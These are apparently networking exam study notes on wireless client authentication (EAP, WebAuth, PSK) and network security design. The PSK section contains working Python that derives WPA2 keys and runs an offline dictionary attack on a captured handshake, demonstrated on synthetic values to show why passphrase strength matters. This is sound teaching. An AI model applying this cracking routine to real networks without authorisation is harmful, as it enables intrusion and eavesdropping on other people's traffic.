Wireless networks are exposed to a number of threats, including unauthorized access, rogue APs, denial-of-service attacks and eavesdropping on traffic sent over the air, so a wireless network must be secured with appropriate authentication and encryption. The following describes the three client-authentication options covered here: EAP, WebAuth, and PSK.
5.4.a EAP (Extensible Authentication Protocol)
EAP (Extensible Authentication Protocol, RFC 3748) is an authentication framework rather than a single authentication method. It defines a request/response carrier, and the actual authentication is performed by an EAP method negotiated inside it, such as EAP-TLS, EAP-TTLS, PEAP, or EAP-FAST. On a wireless network EAP is carried over 802.1X (EAPOL) between the client (supplicant) and the AP or wireless LAN controller (authenticator), which relays it to a RADIUS authentication server; this is the basis of WPA2/WPA3-Enterprise. A successful EAP exchange yields a per-session Pairwise Master Key (PMK) that seeds the 4-way handshake, so every client ends up with its own encryption keys. EAP itself does not encrypt user traffic; the protection against eavesdropping comes from the keys derived after authentication.
What PKI is needed depends on the method. All of the common methods (EAP-TLS, PEAP, EAP-TTLS) need a digital certificate on the RADIUS server so that clients can verify they are talking to the legitimate authentication server; only EAP-TLS also requires a certificate on every client. PEAP and EAP-TTLS authenticate the client with a username and password inside the TLS tunnel, and EAP-FAST can establish its tunnel with a Protected Access Credential (PAC) instead of a client certificate. The APs themselves do not need certificates for EAP; they pass the EAP traffic through to the RADIUS server. Clients must be configured to validate the server certificate (trusted CA and expected server name); a client that skips this check will hand its credentials to a rogue AP running its own RADIUS server.
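To make the "framework, not a method" point concrete, here is an added example (not code from the original page or from any Cisco product) that encodes and decodes EAP packets per RFC 3748 and walks through a constructed exchange in which the authenticator proposes PEAP, the peer answers with a Nak listing EAP-TLS, and the authenticator switches methods. The identity string, the method lists, and the exchange itself are constructed for illustration; the Code and Type values are the IANA-registered ones.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

# EAP Code values (RFC 3748, section 4)
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4

# A few IANA-registered EAP Type values; the Type octet is what selects the method
EAP_IDENTITY, EAP_NAK, EAP_TLS, EAP_TTLS, EAP_PEAP, EAP_FAST = 1, 3, 13, 21, 25, 43
TYPE_NAMES = {EAP_IDENTITY: "Identity", EAP_NAK: "Nak", EAP_TLS: "EAP-TLS",
              EAP_TTLS: "EAP-TTLS", EAP_PEAP: "PEAP", EAP_FAST: "EAP-FAST"}


@dataclass
class EapPacket:
    code: int
    identifier: int
    method_type: Optional[int]  # None for Success/Failure, which carry no Type octet
    type_data: bytes


def build_eap(code: int, identifier: int, method_type: Optional[int] = None,
              type_data: bytes = b"") -> bytes:
    """Encode an EAP packet: Code(1) Identifier(1) Length(2) [Type(1) Type-Data]."""
    body = b"" if method_type is None else bytes([method_type]) + type_data
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body


def parse_eap(buf: bytes) -> EapPacket:
    """Decode an EAP packet, rejecting the malformed lengths RFC 3748 says to discard."""
    if len(buf) < 4:
        raise ValueError("EAP header is 4 octets")
    code, identifier, length = struct.unpack("!BBH", buf[:4])
    if length < 4 or length > len(buf):
        # A Length larger than the buffer means a truncated packet; never read past it
        raise ValueError(f"EAP Length {length} does not fit {len(buf)} octets")
    body = buf[4:length]  # octets beyond Length are padding and are ignored
    if code in (EAP_SUCCESS, EAP_FAILURE):
        if body:
            raise ValueError("Success/Failure must have Length 4")
        return EapPacket(code, identifier, None, b"")
    if code not in (EAP_REQUEST, EAP_RESPONSE):
        raise ValueError(f"unknown EAP Code {code}")
    if not body:
        raise ValueError("Request/Response needs a Type octet")
    return EapPacket(code, identifier, body[0], bytes(body[1:]))


def is_malformed(buf: bytes) -> bool:
    """True when the parser rejects the buffer (what a robust authenticator should do)."""
    try:
        parse_eap(buf)
        return False
    except ValueError:
        return True


def authenticator_next(req_type: int, resp: EapPacket, offered: List[int]) -> Optional[int]:
    """Method negotiation from the authenticator's side (RFC 3748, section 5.3).

    If the peer answered our Request with a Nak, pick the first method it listed
    that we also support; None means no overlap and the authenticator sends Failure."""
    if resp.method_type != EAP_NAK:
        return req_type               # peer accepted the method we proposed
    for t in resp.type_data:          # Nak Type-Data lists the peer's desired Types
        if t in offered:
            return t
    return None


def negotiate_demo() -> List[str]:
    """Constructed exchange: server prefers PEAP, client only speaks EAP-TLS and Naks."""
    server_methods = [EAP_PEAP, EAP_TLS]   # assumed server policy, most preferred first
    log = []
    # Identity round
    parse_eap(build_eap(EAP_REQUEST, 1, EAP_IDENTITY))
    resp = parse_eap(build_eap(EAP_RESPONSE, 1, EAP_IDENTITY, b"alice@example.com"))
    log.append(f"Identity: {resp.type_data.decode()}")
    # Server proposes its preferred method; the peer Naks and lists what it supports
    req = parse_eap(build_eap(EAP_REQUEST, 2, EAP_PEAP))
    resp = parse_eap(build_eap(EAP_RESPONSE, 2, EAP_NAK, bytes([EAP_TLS])))
    chosen = authenticator_next(req.method_type, resp, server_methods)
    log.append(f"Nak -> {TYPE_NAMES[chosen]}")
    # The first EAP-TLS Request carries the Start flag (0x20) in its Flags octet (RFC 5216)
    req = parse_eap(build_eap(EAP_REQUEST, 3, EAP_TLS, b"\x20"))
    log.append(f"Request/{TYPE_NAMES[req.method_type]} start")
    return log
```

The Nak step is the mechanism that makes EAP "extensible": the outer packet format never changes, and the Type octet (plus the Nak response) lets the two sides agree on which method runs inside it. The length check in parse_eap is the kind of validation a RADIUS server or authenticator must do, because EAP packets arrive from unauthenticated peers.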
5.4.b WebAuth (Web Authentication)
WebAuth (Web Authentication) is a security feature that lets guests or other users gain network access through a web-based authentication portal. The client first associates and obtains an IP address (WebAuth is a Layer 3 method), after which its web traffic is redirected to the portal and blocked from anything else until the user provides valid credentials, typically a username and password, or accepts a terms-of-use page.
The WebAuth portal can be customized to display the organization's logo and other branding elements, and it can redirect the user to a specific URL after successful authentication. Two practical points: the portal should be served over HTTPS with a certificate the browser trusts, since it collects credentials, and WebAuth by itself does not encrypt traffic over the air. It is commonly run on an open SSID, so if confidentiality matters it should be combined with a PSK or with Enhanced Open (OWE), which encrypt the link without requiring user credentials.
5.4.c PSK (Pre-Shared Key)
PSK (Pre-Shared Key), used by WPA2-Personal, is a wireless security method in which the access point and every client are configured with the same passphrase. The passphrase is not used directly as the encryption key: the client and the AP each derive a 256-bit Pairwise Master Key (PMK) from the passphrase and the SSID using PBKDF2-HMAC-SHA1 with 4096 iterations, and the 4-way handshake then combines that PMK with nonces and MAC addresses to produce the per-session Pairwise Transient Key (PTK) that actually encrypts and decrypts traffic.
The network administrator configures the PSK on the access point (or on the WLAN on the controller) and shares the passphrase with the authorized wireless clients. PSK is simple and adequate for small networks, but it does not scale and is easily compromised, for specific reasons: there is no per-user identity, so access cannot be revoked for one person without rekeying every client; anyone who knows the passphrase and captures another client's 4-way handshake can derive that client's keys and decrypt its traffic; and an attacker who captures a single 4-way handshake (or the PMKID in its first message) can run an offline dictionary attack against the passphrase with no further contact with the network. WPA3-Personal (SAE) replaces the PSK handshake with one that resists offline guessing, but it still relies on a single shared credential.
Because the only defense against that offline guessing is passphrase entropy, the network administrator must choose a strong passphrase: at least 12 characters long (WPA2 allows 8 to 63 ASCII characters), a mix of uppercase and lowercase letters, numbers, and special characters, and not derived from the SSID, the organization's name, or any dictionary word. The passphrase should be changed periodically and whenever someone who knows it leaves or a device that stores it is lost.
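The derivation and the weakness described above, as an added example that is not part of the original page: the code below computes the WPA2 PMK from a passphrase and SSID, derives the Key Confirmation Key (the first 128 bits of the PTK) and the EAPOL-Key MIC exactly as a client does, and then runs the offline dictionary attack an eavesdropper can mount against a captured handshake. The SSID, MAC addresses, nonces, wordlist, and EAPOL-Key frame bytes are constructed for the demonstration (the frame is a synthetic message 2 body with its MIC field zeroed, not a real capture); the PBKDF2, PRF, and MIC constructions are the ones specified in IEEE 802.11.

```python
import hashlib
import hmac
from typing import List, Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PSK = PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def wpa2_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 128 bits of the PTK: the Key Confirmation Key that MICs the handshake messages."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 16)


def eapol_key_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2-CCMP (Key Descriptor Version 2): HMAC-SHA1 over the EAPOL-Key frame, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def offline_dictionary_attack(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
                              snonce: bytes, frame: bytes, mic: bytes,
                              wordlist: List[str]) -> Optional[str]:
    """Test candidate passphrases against a captured handshake.

    Everything needed (MACs, nonces, frame, MIC) is visible in the capture, so the
    attacker never has to talk to the AP again; only passphrase entropy slows this down."""
    for cand in wordlist:
        kck = wpa2_kck(wpa2_pmk(cand, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_key_mic(kck, frame), mic):
            return cand
    return None


# Constructed handshake material (assumed values, not a real capture)
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Synthetic EAPOL-Key message 2: EAPOL header, descriptor/key-info/length/replay counter,
# SNonce, then the remaining fields zeroed (including the 16-byte MIC field)
FRAME = bytes.fromhex("0203005f02010a00000000000000000001") + SNONCE + bytes(50)
WORDLIST = ["password", "Summer2023!", "letmein", "CorpGuest2023"]


def capture_for(passphrase: str) -> bytes:
    """What the eavesdropper sniffs: the MIC the legitimate client computed."""
    kck = wpa2_kck(wpa2_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_key_mic(kck, FRAME)


def crack(passphrase: str) -> Optional[str]:
    """Simulate a network using `passphrase`, capture its handshake, and attack it."""
    return offline_dictionary_attack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                                     FRAME, capture_for(passphrase), WORDLIST)
```

The PBKDF2 step is deliberately slow (4096 HMAC-SHA1 iterations per guess), but it is the only cost the attacker pays per candidate, and it parallelizes trivially on GPUs; a passphrase that appears in a wordlist falls regardless. Note also that the PMK depends on the SSID, so two networks with the same passphrase but different SSIDs have different PMKs, and a precomputed table only helps against common SSIDs.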
5.5 Describe the components of network security design
Network security design involves several components that work together to protect the network against a range of threats. Two of them are threat defense and endpoint security.
Threat defense is the identification and mitigation of threats to the network, both external and internal. It is implemented with controls such as firewalls, intrusion detection and prevention systems, and other security technologies that detect and block unauthorized access, malware, and data exfiltration, and that produce the logs and alerts needed to investigate incidents.
Endpoint security protects the individual devices connected to the network, including laptops, desktops, servers, and mobile devices. It includes antivirus and anti-malware or EDR software, patching, host firewalls, strong authentication and password policies, and limiting each user's access to the data and systems they need. Endpoint state can also feed the network design: a NAC solution can check a device's posture before deciding how much network access to grant.
Overall, network security design requires a comprehensive approach that takes into account the unique risks and requirements of the network, as well as the available resources and technologies. By implementing the right security measures and best practices, organizations can help to minimize the risk of security incidents and protect their valuable data and assets.
5.5.c Next-generation firewall
Next-generation firewalls (NGFWs) combine traditional stateful firewall functionality with additional features such as intrusion prevention, application awareness (identifying applications and users regardless of port), deep packet inspection, URL filtering, and integration with threat-intelligence feeds. They provide more granular control over network traffic than port- and address-based rules and can identify and block advanced threats. Inspecting encrypted traffic requires TLS decryption at the firewall, which has privacy, performance, and certificate-management implications that the design must account for.
5.5.d TrustSec, MACsec
TrustSec is a Cisco technology that provides identity-based network access control and policy enforcement. A Security Group Tag (SGT) is assigned to traffic at ingress based on who or what the device is (typically by Cisco ISE after 802.1X, MAB, or WebAuth), carried through the network inline or shared between devices with SXP, and enforced at egress by Security Group ACLs (SGACLs), so policy is written in terms of groups rather than IP addresses. MACsec (IEEE 802.1AE) encrypts and integrity-protects Ethernet frames hop by hop at the link layer using AES-GCM, with keys negotiated by MKA (from 802.1X-2010); it protects the wire between two directly connected devices against eavesdropping, tampering, and replay, including man-in-the-middle insertion on the link.
5.5.e Network access control with 802.1X, MAB, and WebAuth
Network access control (NAC) technologies enforce security policy on devices attempting to join a network. 802.1X is an IEEE standard for port-based access control: the supplicant on the device authenticates through the switch or AP (the authenticator) to a RADIUS authentication server using EAP, and the port is opened, assigned a VLAN or downloadable ACL, or kept closed based on the result. MAC Authentication Bypass (MAB) is a fallback for devices that have no 802.1X supplicant, such as printers and IP phones: the authenticator sends the device's MAC address to the RADIUS server as its identity. Because a MAC address is easily spoofed, MAB should be limited to such devices and paired with restrictive authorization. WebAuth provides web-based authentication for users on devices that cannot use 802.1X or MAB, such as guest devices. A switch port is typically configured with an authentication order and priority, for example try 802.1X first, fall back to MAB, and then to WebAuth, so that each device ends up with the strongest method it supports.